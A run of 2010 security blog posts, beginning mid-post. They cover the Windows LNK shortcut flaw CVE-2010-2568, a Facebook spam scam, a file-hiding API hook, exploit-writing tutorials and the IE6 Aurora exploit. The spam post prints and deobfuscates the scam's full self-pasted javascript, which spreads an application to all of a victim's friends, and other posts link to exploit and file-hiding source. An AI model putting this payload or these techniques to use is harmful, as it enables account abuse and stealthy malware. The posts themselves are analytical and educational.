The interesting thing of this vulnearbility is that you no longer need AutoPlay enabled but you still can run the specified program ;) See the demo below.<br />
<br />
Before we proceed, lets see the LNK file format which is the culprit:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBEbeY4b5jdTJ5vwpD2YuHLV8K_hyphenhyphen7IYYEfHAFAunG98SU6L7TAduspxejAbYIY9i7-HABY_fUqutC7XpI_jmuCTkyzZpBofk61M4cj8DtKKrk7X1XFF-Ku3TTAZuT_Tia_bXs7C4MM3Ze/s1600/lnk_file_format.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBEbeY4b5jdTJ5vwpD2YuHLV8K_hyphenhyphen7IYYEfHAFAunG98SU6L7TAduspxejAbYIY9i7-HABY_fUqutC7XpI_jmuCTkyzZpBofk61M4cj8DtKKrk7X1XFF-Ku3TTAZuT_Tia_bXs7C4MM3Ze/s320/lnk_file_format.bmp" /></a></div><br />
Starting from the <span style="color: lime;">GREEN region</span>, that is <b>SHELL_ITEM_LIST</b> which is documented in MSDN. The file location is defined after <b>SHITEMID</b> structure.Notice that the shell CLSID for My Computer & Control Panel in <span style="color: lime;">GREEN region<span style="color: black;">:</span></span><br />
<br />
<b>My Computer: </b>{20d04fe0-3aea-1069-a2d8-08002b30309d}<br />
<b>Control Panel: </b>{21ec2o2o-3aea-1o69-a2dd-08002b30309d}<br />
<br />
These shells are defined so that it will be handled by shell32.dll which is the caused of autoexecution. For more technical information on how autoexecution happened, there is a nice debug screenshot from <i>ivanlef0u</i> who is the first person posted this exploit publicly ;) Check this out: <a href="http://www.exploit-db.com/exploits/14403/">http://www.exploit-db.com/exploits/14403/</a><br />
<br />
Microsoft's workaround on this 0-day vulnearbility: <a href="http://support.microsoft.com/kb/2286198">http://support.microsoft.com/kb/2286198</a><br />
<br />
<b><span style="font-size: large;">Demo Video</span></b><br />
<br />
<span style="font-size: large;"><span style="font-size: small;">This demo is a simple one and mostly based on </span></span><i>ivanlef0u's </i>one with some minor modification. The dll is simple enough which I include the source code in the attachment section. Have fun :)<br />
<br />
<div style="text-align: center;"><object height="344" width="425"><param name="movie" value="http://www.youtube.com/v/nrDIrvodEo0&hl=en&fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/nrDIrvodEo0&hl=en&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></div><br />
<b><span style="font-size: large;">Attachment</span></b><br />
<br />
<span style="font-size: small;">Executable files: <a href="http://www.4shared.com/file/162tMLPu/mytest.html">Bin</a></span><br />
<span style="font-size: small;">Simple DLL & LNK file: </span><a href="http://www.4shared.com/file/_tl6WkdN/CplApplet_LNK.html"><span style="font-size: large;"><span style="font-size: small;">Src</span></span></a><b><span style="font-size: large;"><br />
</span></b><br />
<br />
<b><span style="font-size: large;">Reference</span></b><br />
<br />
[1] <span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"> <a href="http://www.microsoft.com/technet/security/advisory/2286198.mspx">http://www.microsoft.com/technet/security/advisory/2286198.mspx</a> -- <i>Microsoft Advisory </i></span></span></span></span></span></span></span></span></span></span><i><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;">CVE-2010-2568</span></span></span></span></span></span></span></span></span></span></i><br />
<br />
<span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;">[2] <a href="http://www.stdlib.com/art6-Shortcut-File-Format-lnk.html">http://www.stdlib.com/art6-Shortcut-File-Format-lnk.html</a></span></span></span></span></span></span></span></span></span></span><i><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"> -- </span></span></span></span></span></span></span></span></span></span></i><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><i>Shorcut LNK File Format</i></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;">[3] <a href="http://msdn.microsoft.com/en-us/library/bb759800%28VS.85%29.aspx">http://msdn.microsoft.com/en-us/library/bb759800%28VS.85%29.aspx</a><i> -- SHITEMID Structure</i></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;">[4] <a href="http://www.symantec.com/connect/blogs/w32stuxnet-installation-details">http://www.symantec.com/connect/blogs/w32stuxnet-installation-details</a><i> -- Symantec Stuxnet Technical Info - Part I</i></span></span></span></span></span></span></span></span></span></span><br />
<span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><i> </i><i> </i></span></span></span></span></span></span></span></span></span></span><br />
<span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;">[5] <a href="http://www.symantec.com/connect/blogs/distilling-w32stuxnet-components">http://www.symantec.com/connect/blogs/distilling-w32stuxnet-components</a><i> -- Symantec Stuxnet Technical Info - Part II</i><i> </i></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;"><span style="font-size: x-large;"><span style="font-size: small;">[6] <a href="http://www.f-secure.com/v-descs/trojan-dropper_w32_stuxnet.shtml">http://www.f-secure.com/v-descs/trojan-dropper_w32_stuxnet.shtml</a><i> -- F-Secure Stuxnet Description</i></span></span></span></span></span></span></span></span></span></span><br />
<br />
Signing off @x9090x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com6tag:blogger.com,1999:blog-1022731470813881575.post-3809836768720951782010-05-17T00:43:00.001+08:002010-06-27T16:10:52.995+08:00Facebook Spam3 days ago I received an email from Facebook team sent by my old friend who I haven't met since after University graduation. I was abit curious about what he wanted to send me (To be honest I was attracted by the email subject ^_^):<br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJqcyPkGsHXscfh430o6_WAQOWprk8NI_d-xOmYnza8_4yMWYHpZDQGqEt4X3kkNoXXoqVpBpOG8n2PQhuPCV1dhm15QSd2Z-V7Cwug0XC7P98HS5xZi5zXgjW2pFLXf6liITUmglf6JEq/s1600/My_Gmail.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJqcyPkGsHXscfh430o6_WAQOWprk8NI_d-xOmYnza8_4yMWYHpZDQGqEt4X3kkNoXXoqVpBpOG8n2PQhuPCV1dhm15QSd2Z-V7Cwug0XC7P98HS5xZi5zXgjW2pFLXf6liITUmglf6JEq/s640/My_Gmail.png" width="640" /></a></div><br />
But unfortunately I can't give you the screenshot on how the page really looks like. The page is actually a couple that hugged together naked but of course the important parts are all hidden :). I know someone cannot imagine it by words but please use your creative imagination ;)<br />
<br />
Beside this, the main part of this scammer is it includes a combo box with javascript text inside and also instructions on how to copy and paste the javascript code to your browser so that you can see this naked couple. The script looks like this:<br />
<br />
<blockquote><span style="color: yellow;">javascript:(function(){a='app118802484821085_YCbbZr';b='app118802484821085_ZKOHsY';qDDgEj='app118802484821085_qDDgEj';ZsMtqA='app118802484821085_ZsMtqA';nQMzbQ='app118802484821085_nQMzbQ';eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x7</span> <span style="color: yellow;">\2|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6</span></blockquote><blockquote><span style="color: yellow;">x78|x2E|x44|document|nQMzbQ|fs|SocialGraphManager|ZsMtqA|qDDgEj|||||||'.split('|'),0{}))})();</span></blockquote><br />
By looking at this obfuscated javascript code, I decided not to believe my friend and tried to debug the script and see what it actually does. Here is the result of after the deobfuscation of the first layer obfuscation:<br />
<br />
<br />
<blockquote style="color: yellow;">var _0x95ea=[\"\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79\",\"\x73\x74\x79\x6C\x65\",\"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\",\"\x68\x69\x64\x64\x65\x6E\",\"\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C\",\"\x76\x61\x6C\x75\x65\",\"\x73\x75\x67\x67\x65\x73\x74\",\"\x6C\x69\x6B\x65\x6D\x65\",\"\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73\",\"\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74\",\"\x63\x6C\x69\x63\x6B\",\"\x69\x6E\x69\x74\x45\x76\x65\x6E\x74\",\"\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74\",\"\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C\",\"\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D\",\"\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\",\"\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67\"];<br />
d=document;<br />
d[_0x95ea[2]](nQMzbQ)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];<br />
d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];<br />
s=d[_0x95ea[2]](_0x95ea[6]);<br />
m=d[_0x95ea[2]](_0x95ea[7]);<br />
c=d[_0x95ea[9]](_0x95ea[8]);<br />
c[_0x95ea[11]](_0x95ea[10],true,true);<br />
s[_0x95ea[12]](c);<br />
setTimeout(function(){fs[_0x95ea[13]]()},5000);<br />
setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);<br />
setTimeout(function(){m[_0x95ea[12]](c);<br />
d[_0x95ea[2]](ZsMtqA)[_0x95ea[4]]=d[_0x95ea[2]](qDDgEj)[_0x95ea[5]]},5000);</blockquote><br />
It is fairly easy now to understand what the script does. After replacing the array element <b>_0x95ea</b>, the final script will look like this:<br />
<br />
<blockquote style="color: yellow;">a='app118802484821085_YCbbZr';<br />
b='app118802484821085_ZKOHsY';<br />
qDDgEj='app118802484821085_qDDgEj';<br />
ZsMtqA='app118802484821085_ZsMtqA';<br />
nQMzbQ='app118802484821085_nQMzbQ'<br />
var _0x95ea=["visibility","style","getElementById","hidden","innerHTML","value","suggest", "likeme","MouseEvents","createEvent","click","initEvent","dispatchEvent","select_all","sgm_invite_form", "/ajax/social_graph/invite_dialog.php","submitDialog"];<br />
d = document;<br />
d['getElementById'](nQMzbQ)['style']['visibility'] = 'hidden';<br />
d['getElementById'](a)['innerHTML'] = d['getElementById'](b)['value'];<br />
s = d['getElementById']('suggest');<br />
m = d['getElementById']('likeme');<br />
c = d['createEvent']('MouseEvents');<br />
c['initEvent']('click', true, true);<br />
s['dispatchEvent'](c);<br />
setTimeout(function () {<br />
fs['select_all']()<br />
}, 5000);<br />
setTimeout(function () {<br />
SocialGraphManager['submitDialog']('sgm_invite_form', '/ajax/social_graph/invite_dialog.php')<br />
}, 5000);<br />
setTimeout(function () {<br />
m['dispatchEvent'](c);<br />
d['getElementById'](ZsMtqA)['innerHTML'] = d['getElementById'](qDDgEj)['value']<br />
}, 5000);</blockquote><br />
It seems to be a javascript function that utilizes <b>FBML (Facebook Markup Language)</b> that will suggest a defined application to all your friends in your friend's list.<br />
<br />
<b>@Lucas, if you see this please check your machine. Your machine is potentially compromised and infected!</b><br />
<br />
Signing off<br />
~x9090x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com0tag:blogger.com,1999:blog-1022731470813881575.post-65090748555208823542010-04-24T23:34:00.003+08:002010-06-27T17:50:40.593+08:00[DOC] Inline Hook NtQueryDirectoryFile<b><span style="font-size: large;"><span style="font-size: x-large;">I</span>nline <span style="font-size: x-large;">H</span>ook <span style="font-size: x-large;">N</span>tQueryDirectoryFile</span></b><br />
<br />
<span style="font-size: small;">Hola!</span><br />
<br />
<span style="font-size: small;">There are a lot of sample source codes available on Internet about hooking on NtQueryDirectoryFile/ZwQueryDirectoryFile to achieve Windows file hidding capabilities but there are mostly using driver.</span><br />
<span style="font-size: small;"><br />
</span><br />
<span style="font-size: small;">It is nothing new anymore and has been discussed throughout the Internet and even the algorithm had been around a few years back. One of my favourite articlesHoly Father's <a href="http://vxheavens.com/lib/vhf00.html#p31">Invisibility on NT boxes, How to become unseen on Windows NT</a> has digged deeply on a few stealth techniques on Windows. One of these stealth techiques is file hidding.</span><br />
<br />
<span style="font-size: small;">A short demo video:</span><br />
<br />
<div style="text-align: center;"><object height="344" width="425"><param name="movie" value="http://www.youtube.com/v/9kyeYjsMx7o&hl=en&fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/9kyeYjsMx7o&hl=en&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></div><br />
<span style="font-size: small;">The source code can be downloaded <a href="http://en.pudn.com/downloads245/sourcecode/windows/file/detail1141823_en.html">here</a>.</span><br />
<br />
<span style="font-size: small;"><b>Update: [10/05/2010]</b></span><br />
<br />
<span style="font-size: small;">Alternative download link: <a href="http://www.4shared.com/file/7jaxJs2K/inline_hooks_ntquerydirectoryf.html">http://www.4shared.com/file/7jaxJs2K/inline_hooks_ntquerydirectoryf.html</a></span><br />
<br />
<span style="font-size: small;">Please note that the program does not work under Vista/Windows 7. In order to hide files in Vista or higher OS, you have to use <b>FileIdBothDirectoryInformation </b>in <b>FileInformationClass.</b> </span><br />
<br />
<span style="font-size: small;">Signing off.</span><br />
<span style="font-size: small;">@x9090</span>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com11tag:blogger.com,1999:blog-1022731470813881575.post-6178012632103364832010-03-14T22:31:00.007+08:002010-04-24T18:59:38.257+08:00[TUTORIAL] Exploit Writting Tutorial From Basic To Intermediate<b><span style="font-size: large;">E</span>xploit <span style="font-size: large;">W</span>ritting <span style="font-size: large;">T</span>utorial <span style="font-size: large;">F</span>rom <span style="font-size: large;">B</span>asic <span style="font-size: large;">T</span>o <span style="font-size: large;">A<span style="font-size: small;">dvanced</span></span></b><br />
<b><br />
</b><br />
There are increasing number of bloggers who like to share thier knowledge in exploit especially the topic on how to create and write your own exploit.<br />
<br />
In this post, I would like to combine the exploits tutorial that I have came across. This is not the comprehensive collection but at least its a good starting point for exploits beginners.<br />
<br />
<b><span style="font-size: large;">BASIC</span></b><br />
<br />
<span style="font-size: large;"><span style="font-size: small;">David Hoelzer</span></span> tutorial that is intended for application/software developers from <a href="http://www.sans.org/info/35319">SANS Institude</a>. For application/software developers, the overall presentation is meant to explain the basic concept of buffer overflow, how does it occurs, how to exploit it using manual/automation way and create the exploit using metasploit and automate the exploitation process.<br />
<br />
The source code of the vulnerable server can be found on his blog. <br />
<br />
The video tutorials can be downloaded <a href="http://www.4shared.com/file/241025500/93fbec61/Metasploit_Exploit_Creation_St.html">here</a><br />
<br />
-- Reference: <a href="http://www.enclaveforensics.com/Blog/files/e6fb7327cb615688f90fc07656a3880d-28.html">http://www.enclaveforensics.com/Blog/files/e6fb7327cb615688f90fc07656a3880d-28.html</a> <br />
<br />
<br />
<b><span style="font-size: large;">INTERMEDIATE</span></b><br />
<br />
<span style="font-size: large;"><span style="font-size: small;">I consider this as intermediate and focus more on the real application exploit. Lupin from <i>The Grey Corner </i>explains exploit from basic to intermediate</span></span> level with step by step debugging. Here is the summary:<br />
<ol><li><span style="color: yellow;">Stack Based Windows Buffer Overflow Tutorial</span> - <a href="http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html">http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html</a></li>
<li><span style="color: yellow;">SEH Stack Based Windows Buffer Overflow Tutorial</span> - <a href="http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html">http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html</a></li>
<li><span style="color: yellow;">Windows Buffer Overflow Tutorial: Dealing with Character Translation</span> - <span id="goog_1268552496510"></span><a href="http://www.blogger.com/"> http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html</a><span id="goog_1268552496511"></span> </li>
<li><span style="color: yellow;">Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability</span> - <a href="http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html">http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html</a></li>
<li><span style="color: yellow;">Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump <span style="color: black;">- <a href="http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html">http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html</a></span></span></li>
</ol><b> </b><br />
-- Reference: <a href="http://grey-corner.blogspot.com/">http://grey-corner.blogspot.com</a><br />
<br />
<br />
<b><span style="font-size: large;">ADVANCED</span></b><br />
<br />
<span style="font-size: large;"><span style="font-size: small;">Peter Van Eeckhoutte is the first one who started this exploit tutorial (at least he is the first one who has provided most comprehensive guides on exploit development and keeps updating from time to time that I have ever seen).</span></span><br />
<br />
Peter Van Eeckhoutte<br />
<br />
<ol><li><span style="color: yellow;">Exploit writting tutorial part 1:Stack Based Overflows</span> - <a href="http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/">http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/</a></li>
<li><span style="color: yellow;">Exploit writting tutorial part 2: Stack Based Overflows - jumping to shellcode</span> - <a href="http://www.corelan.be:8800/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/">http://www.corelan.be:8800/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/</a></li>
<li><span style="color: yellow;">Exploit writting tutorial part 3: SEH Based Exploits</span> - <a href="http://www.corelan.be:8800/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/">http://www.corelan.be:8800/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/</a></li>
<li><span style="color: yellow;">Exploit writting tutorial part 3b: SEH Based Exploits</span> <span style="color: yellow;">- just another example - </span><a href="http://www.corelan.be:8800/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/">http://www.corelan.be:8800/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/</a></li>
<li><span style="color: yellow;">Exploit writting tutorial part 4: From Exploit to Metasploit - The basics</span> - <a href="http://www.corelan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/">http://www.corelan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/</a></li>
<li><span style="color: yellow;">Exploit writting tutorial part 5: How debugger modules & plugins can speed up basic exploit development</span> - <a href="http://www.corelan.be:8800/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/">http://www.corelan.be:8800/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/</a></li>
<li><span style="color: yellow;">Exploit writting tutorial part 6: Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR</span> - <a href="http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/">http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/</a></li>
<li><span style="color: yellow;">Exploit writting tutorial part 7: Unicode - from 0x00410041 to calc</span> - <a href="http://www.corelan.be:8800/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/">http://www.corelan.be:8800/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/</a></li>
<li><span style="color: yellow;">Exploit writting tutorial part 8: Win32 Egg Hunting </span>- <a href="http://www.corelan.be:8800/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/">http://www.corelan.be:8800/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/</a></li>
<li><span style="color: yellow;">Exploit writting tutorial part 9: Introduction to Win32 shellcoding</span> - <a href="http://www.corelan.be:8800/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/">http://www.corelan.be:8800/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/</a></li>
</ol><br />
-- Reference: <a href="http://www.corelan.be:8800/">http://www.corelan.be:8800</a><br />
<br />
<br />
If you have any nice exploit tutorials, please feel free to leave a comment here to share with others :)<br />
<br />
Thanks!<br />
<br />
<b>Update:</b><br />
<b>- Part 5 from grey-corner [24/04/2010]</b>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com6tag:blogger.com,1999:blog-1022731470813881575.post-8015849015614879252010-01-17T15:12:00.004+08:002010-01-17T15:59:58.454+08:00CVE-2010-0249 - Internet Explorer 6 mshtml.dll Remote Code Execution<b><span style="font-size: large;">R</span>emote <span style="font-size: large;">C</span>ode <span style="font-size: large;">E</span>xecution <span style="font-size: large;">i</span>n <span style="font-size: large;">m</span>shtml.dll <span style="font-size: large;">i</span>n <span style="font-size: large;">I</span>nternet <span style="font-size: large;">E</span>xplorer 6</b><br />
<a href="http://www.blogger.com/goog_1263705941725"><br />
</a><br />
<a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249">CVE-2010-0249</a> is a vulnerability utilized in Google targeted attack and it can be used to exploit one of the IE 6 DLL components mshtml.dll.<br />
<br />
This post is to demonstrate the recently released Metasploit "Aurora" module that manipulate this exploit.<br />
<div class="separator" style="clear: both; text-align: center;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="http://img132.imageshack.us/img132/3274/auroras.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="http://img132.imageshack.us/img132/3274/auroras.gif" width="400" /></a><br />
</div><br />
<div class="separator" style="clear: both; text-align: center;"><br />
</div><br />
I am not able to post the exploit code here probably it was blocked by Google blog as the shellcode or the Javascript code is detected by them.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl6L7JKaKIsFwZv4Xsq5-CRd6njh8bqoH3U7JwipWNdihQH6NsY2uPhpkB6tPnYQ3iI5YtWQpMmLTc5bV65b4GnP31dXoncbn6r0IYro5jaN29MQdn1i6PQ4K3HRXMJuxyVfzmSEhsJ5NY/s1600-h/xploit_01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl6L7JKaKIsFwZv4Xsq5-CRd6njh8bqoH3U7JwipWNdihQH6NsY2uPhpkB6tPnYQ3iI5YtWQpMmLTc5bV65b4GnP31dXoncbn6r0IYro5jaN29MQdn1i6PQ4K3HRXMJuxyVfzmSEhsJ5NY/s640/xploit_01.jpg" /></a><br />
</div><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4s8XlVNz_eNerueJx7Ep4YlVIRqryfS9fzauFYU0aM3620G41h76wpQ_7suplXRL3kbYsxk-bAOIbGKlTQNExUv2mD58aqTbTlXHyksrNV08KOmLGmD7cs_8vHhUjHLSNlz8NWQORyK67/s1600-h/xploit_02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4s8XlVNz_eNerueJx7Ep4YlVIRqryfS9fzauFYU0aM3620G41h76wpQ_7suplXRL3kbYsxk-bAOIbGKlTQNExUv2mD58aqTbTlXHyksrNV08KOmLGmD7cs_8vHhUjHLSNlz8NWQORyK67/s640/xploit_02.jpg" /></a><br />
</div><br />
<br />
The shellcode is obfuscated and I deobfuscate it using HIEW:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVa3dNZIKyNDTdu6Xep1hT4gKDXNBfh6eTkWCx3A4nE9p19IIDsFfVzP_ni3cJBpwTBwj16PXLuLQHd9_chO5ayjtYZ-3TqzovKwoLNO7nzz1LiHz6IXsjwdMmX9a5jMovWX-HnGJQWYkQ/s1600-h/decryption_01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVa3dNZIKyNDTdu6Xep1hT4gKDXNBfh6eTkWCx3A4nE9p19IIDsFfVzP_ni3cJBpwTBwj16PXLuLQHd9_chO5ayjtYZ-3TqzovKwoLNO7nzz1LiHz6IXsjwdMmX9a5jMovWX-HnGJQWYkQ/s400/decryption_01.jpg" /></a><br />
</div><div class="separator" style="clear: both; text-align: center;"><br />
